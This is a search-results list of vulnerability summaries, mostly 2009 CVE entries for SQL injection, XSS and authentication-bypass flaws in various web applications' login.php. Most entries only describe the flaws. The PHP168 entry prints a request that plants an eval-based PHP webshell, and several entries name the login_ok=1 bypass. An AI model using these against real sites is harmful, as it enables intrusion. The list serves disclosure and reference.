1444 matches found
CVE-2009-3758
CVE-2009-3758 is a SQL injection in login.php of the XenServer Resource Kit / XenCenterWeb. The vulnerability allows remote attackers to execute arbitrary SQL commands via the username parameter, as described in NVD/NIST and mirrored in multiple sources. Public exploit coverage is indicated by a ...
CVE-2009-3422
login.php in Zenas PaoLiber 1.1, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1...
Authentication flaw
login.php in Zenas PaoLink 1.0, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1...
CVE-2009-3423
CVE-2009-3423 affects Zenas PaoLink 1.0. When login_globals is enabled, an attacker can bypass authentication by setting the login_ok parameter to 1 in login.php, gaining administrative access. The NVD entry records a CVSSv2 base score of 6.8 (MEDIUM) with network attack vector and no authenticat...
CVE-2009-3423
login.php in Zenas PaoLink 1.0, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1...
CVE-2009-3430
The CVE-2009-3430 entry concerns Allomani Mobile 2.5, where a SQL injection flaw in login.php allows remote attackers to manipulate the database by supplying crafted input in the username field during login. The vulnerability is caused by unsafely handling user input in the login action, enabling...
CVE-2009-3421
CVE-2009-3421 affects Zenas PaoBacheca Guestbook 2.1. The vulnerability is in login.php and arises when PHP register_globals is enabled. An attacker can bypass authentication and gain administrative access by setting the login_ok parameter to 1. The NVD notes a high-severity impact (confidentiali...
CVE-2009-3327
Multiple SQL injection vulnerabilities in WX-Guestbook 1.1.208 allow remote attackers to execute arbitrary SQL commands via the (1) QUERY parameter to search.php and (2) USERNAME parameter to login.php. NOTE: some of these details are obtained from third party information...
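Major security vulnerability in login.php of PHP168 6.0 and earlier
The PHP168 site system has long been favored by a wide range of users, thanks to its strengths in power, stability, security, flexibility and ease of use ... the continuous improvement of its architecture and features has made PHP168 one of the most mainstream CMS systems. login.php handles parameters improperly: an intruder can craft a special statement on the user login page to write a PHP one-liner into the cache directory, thereby gaining WEBSHELL access to sites running the PHP168 site system. PHP168 versions below 6.0. None yet. Awaiting an official patch. login.php?makehtml=1&chdbhtmlname=honker.php&chdbpath=cache&content=?php%20@eval$POSThonker;?...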
Property Watch 2.0 Cross Site Scripting
Property Watch v2.0 Remote XSS Vulnerabilities Discovered By : Moudi Contact : Download : http://www.propertywatchscript.com/ Greetings :...
CVE-2009-2928
CVE-2009-2928 is an XSS vulnerability in TGS Content Management 0.x, specifically in login.php, where the parameter previous_page can inject arbitrary script/HTML. This entry is supported by NVD details (description of XSS via previous_page) and does not include explicit exploit status or a publi...
CVE-2009-2921
CVE-2009-2921 affects MOC Designs PHP News 1.1. Multiple SQL injection vulnerabilities exist in login.php, exploitable via the newsuser (User) and newspassword (Password) fields. Remote attackers can cause arbitrary SQL execution. The provided documents do not specify the underlying root cause, aff...
CVE-2009-2921
Multiple SQL injection vulnerabilities in login.php in MOC Designs PHP News 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) newsuser parameter (User field) and (2) newspassword parameter (Password field)...
CVE-2009-2883
An SQL injection vulnerability in SaphpLesson 4.0 (admin/login.php) can be triggered when magic_quotes_gpc is disabled, allowing remote attackers to execute arbitrary SQL via the cp_username parameter. The issue is related to an error in the CleanVar function in includes/functions.php. CVSS v2 ba...
WordPress-MU < 2.8.4 'wp-login.php' Security Bypass Vulnerability
WordPress-MU is prone to a security bypass vulnerability. Copyright (C) 2009 Greenbone Networks GmbH Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you...
Sql injection
Multiple SQL injection vulnerabilities in login.php in The Rat CMS Alpha 2 allow remote attackers to execute arbitrary SQL commands via the (1) userid and (2) password parameter...
CVE-2008-7003
Multiple SQL injection vulnerabilities in login.php in The Rat CMS Alpha 2 allow remote attackers to execute arbitrary SQL commands via the (1) userid and (2) password parameter...
Oracle Secure Backup Administration Server Authentication Bypass Vulnerability
This vulnerability allows remote attackers to bypass authentication on vulnerable installations of Oracle Secure Backup. User interaction is not required to exploit this vulnerability. The specific flaw exists in the logic used to authenticate a user to the administration server running on port...
CVE-2009-2780
Multiple cross-site scripting (XSS) vulnerabilities in 68 Classifieds 4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to category.php, view parameter to (2) login.php and (3) viewlisting.php, page parameter to (4) searchresults.php and (5) toplistings.php, and (6)...